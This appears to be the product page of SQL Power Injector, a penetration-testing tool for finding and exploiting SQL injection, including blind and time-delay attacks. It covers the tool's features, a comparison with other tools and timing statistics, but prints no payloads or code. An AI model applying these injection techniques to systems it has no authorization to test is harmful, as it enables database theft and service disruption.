Product | Tech info | Tutorial | FAQ | Download | Contact | EN

Product Information

Introduction

SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page.

For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone will put in the parameter sent to the server.

If the aspect of inline SQL injection is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only there is a possibility to automate tedious and time consuming queries but you can also modify the query to get only what you want. It is obviously more useful in the blind SQL injection since the other ways to exploit the SQL injection vulnerability is more effusive and much faster when the results are displayed on the web page (union select in a HTML table and generated 500 error for instance).

The automation can be realized in two ways: comparing the expected result or by time delay. The first way is generally compared against an error or difference between positive condition with a negative one and the second way will turn out positive if the time delay sent to the server equals to the one parameterized in the application.

The main effort done on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection parameterized in a way that any related standards SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible.

Another important part of this application is its power to get all the parameters from the web page you need to test the SQL injection, either by GET or POST method. Like this someone won't need to use several applications or a proxy to intercept the data, all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies).

I worked hard on the application usability but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood it will be quite easy to use afterwards. In order to help a beginner to understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, You will find some great tricks in the FAQ as well and now with the version 1.2 a help file (chm) containing a list of the most useful information for SQL injection.

Also, I designed this application the way I was making my own pen testing and how I was using SQL injection. It has been tested successfully many times on real life web sites (legally of course) and as soon as I see something missing I'm adding it. Now of course that it's officially available to the security community I will have to have more rigors and wait to add them in a new version of the software. This process has already started and many more features will come with time.

Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible of any misuses or damage caused by this application.

What It's Not

This application if powerful won't find SQL injection vulnerabilities for you nor will find the right syntax if one found. Its main strength is to provide a way to find them more easily and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique.

Moreover, I didn't intent to make it to be a database pumping application. There are plenty good applications for that purpose. In any cases many pumped data are not relevant and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want.

Lastly, if I added the feature (mini-browser) to have the results in an HTML format it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are real complex software that it would be nearly impossible to implement all their features in my application. That's why that you won't be able to use it as a conventional browser even though it has the same look and feel.

Features


Differences with Other Tools

To be honest, I didn't study all the other tools features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection.

Some application will find the SQL injection for you that sometimes will result in false positive. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need when the list of databases has been pumped. Or ask a specific hard coded data, such as the current DB user.

But none of them have the ability to specifically choose what you want as far as I know. That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required.

Also, I cannot recall to have seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results by giving up after long hours of copy pasting the command in the browser when done manually.

I don't remember as well to have seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures)

I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section.

Summary of the differences:

Screenshots

You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind.

SPInj Normal Technique
Screen 1: SQL Power injector with Normal technique

SPInj Blind Technique
Screen 2: SQL Power injector with Blind technique

Some Statistic Figures

I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data. Another thing, I didn't make enough tests (10 times for each thread) to have a real statistical sample since the goal of these numbers will be to show approximately what you can expect.

Moreover, it will depend also of the size of the data sought. Sometimes a lower number of threads will be more effective than more. In fact, the time taken will be optimized if the length of the value is a divisible number of the number of thread. So let's say we have 24 characters length, 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the bigger gap of time between any thread is from 1 to 2. As you can see the higher is not always the better. You will see some examples in the following statistics.

Even though you can go up to 50 threads, I have discovered that around 10 threads it's starting to have errors and getting slower and slower. So again bigger number of threads is not necessary better. I must warn as well that the higher number of threads is, the higher is the chances to crash the web application (web server or database)

I must thank Nathaniel Felsen to have allowed me to test on one of his web server.

Here are the characteristics of the computer used to make the tests:

With positive answer option

6 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~36 s 0 ms
61
~26 s 193 ms
43
2
~20 s 314 ms
61
~15 s 561 ms
43
3
~20 s 883 ms
61
~15 s 755 ms
43
4
~22 s 705 ms
70
~17 s 540 ms
49
5
~22 s 14 ms
61
~17 s 171 ms
43
6
~19 s 878 ms
61
~15 s 227 ms
43

11 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~1 m 1 s 910 ms
106
~47 s 840 ms
80
2
~35 s 492 ms
106
~26 s 350 ms
80
3
~35 s 157 ms
106
~28 s 220 ms
80
4
~33 s 638 ms
106
~26 s 607 ms
80
5
~35 s 280 ms
106
~26 s 403 ms
80
6
~32 s 426 ms
106
~26 s 983 ms
80
7
~35 s 162 ms
115
~28 s 858 ms
86
8
~40 s 590 ms
106
~28 s 972 ms
80

23 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~2 m 4 s 37 ms
214
~1 m 45 s 905 ms
175
2
~1 m 6 s 57 ms
214
~57 s 552 ms
175
3
~1 m 6 s 418 ms
214
~56 s 714 ms
175
4
~1 m 3 s 759 ms
214
~54 s 575 ms
175
5
~1 m 3 s 57 ms
214
~53 s 743 ms
175
6
~1 m 2 s 995 ms
214
~53 s 750 ms
175
7
~1 m 7 s 870 ms
214
~59 s 178 ms
175
8
~1 m 3 s 285 ms
214
~52 s 938 ms
175

187 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~16 m 42 s 991 ms
1692
~13 m 16 s 31 ms
1303
2
~8 m 32 s 604 ms
1692
~6 m 34 s 562 ms
1303
3
~8 m 24 s 751 ms
1692
~6 m 41 s 286 ms
1303
4
~8 m 9 s 943 ms
1692
~6 m 25 s 358 ms
1303
5
~8 m 10 s 97 ms
1692
~6 m 35 s 30 ms
1303
6
~8 m 12 s 256 ms
1692
~6 m 24 s 839 ms
1303
7
~8 m 14 s 811 ms
1692
~6 m 25 s 531 ms
1303
8
~8 m 13 s 168 ms
1692
~6 m 28 s 909 ms
1303

With time delay of 3 seconds

6 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~2 m 3 s 337 ms
62
~1 m 40 s 941 ms
44
2
~1 m 17 s 114 ms
62
~1 m 7 s 308 ms
44
3
~1 m 16 s 273 ms
62
~1 m 4 s 770 ms
44
4
~1 m 22 s 970 ms
71
~1 m 8 s 701 ms
50
5
~1 m 17 s 349 ms
62
~1 m 4 s 448 ms
44
6
~1 m 13 s 998 ms
62
~1 m 1 s 981 ms
44

11 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~3 m 27 s 825 ms
107
~2 m 42 s 829 ms
80
2
~1 m 54 s 687 ms
107
~1 m 36 s 265 ms
80
3
~1 m 56 s 737 ms
107
~1 m 32 s 425 ms
80
4
~1 m 51 s 883 ms
107
~1 m 29 s 994 ms
80
5
~2 m 4 s 263 ms
107
~1 m 38 s 55 ms
80
6
~1 m 54 s 239 ms
107
~1 m 38 s 112 ms
80
7
~2 m 2 s 25 ms
116
~1 m 41 s 341 ms
80
8
~2 m 19 s 62 ms
107
~1 m 57 s 104 ms
80

23 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~7 m 4 s 531 ms
215
~6 m 11 s 70 ms
176
2
~3 m 42 s 679 ms
215
~3 m 31 s 982 ms
176
3
~3 m 41 s 82 ms
215
~3 m 23 s 911 ms
176
4
~3 m 41 s 791 ms
215
~3 m 22 s 364 ms
176
5
~3 m 43 s 176 ms
215
~3 m 17 s 817 ms
176
6
~3 m 38 s 604 ms
215
~3 m 22 s 348 ms
176
7
~3 m 58 s 906 ms
215
~3 m 41 s 586 ms
176
8
~3 m 38 s 255 ms
215
~3 m 13 s 52 ms
176

187 characters
Number of Threads
Fullset
Optimized
Time taken
Number of request
Time taken
Number of request
1
~59 m 19 s 88 ms
1692
~44 m 2 s 421 ms
1296
2
~30 m 50 s 515 ms
1692
~22 m 36 s 765 ms
1296
3
~30 m 27 s 572 ms
1692
~22 m 43 s 10 ms
1296
4
~30 m 10 s 437 ms
1692
~21 m 56 s 114 ms
1296
5
~29 m 48 s 328 ms
1692
~ 31 m 57 s 703 ms
1296
6
~29 m 41 s 322 ms
1692
~22 m 7 s 432 ms
1296
7
~29 m 26 s 499 ms
1693
~22 m 484 ms
1296
8
~30 m 17 s 641 ms
1692
~22 m 17 s 234 ms
1296

Copyright © 2006-2014 Francois Larouche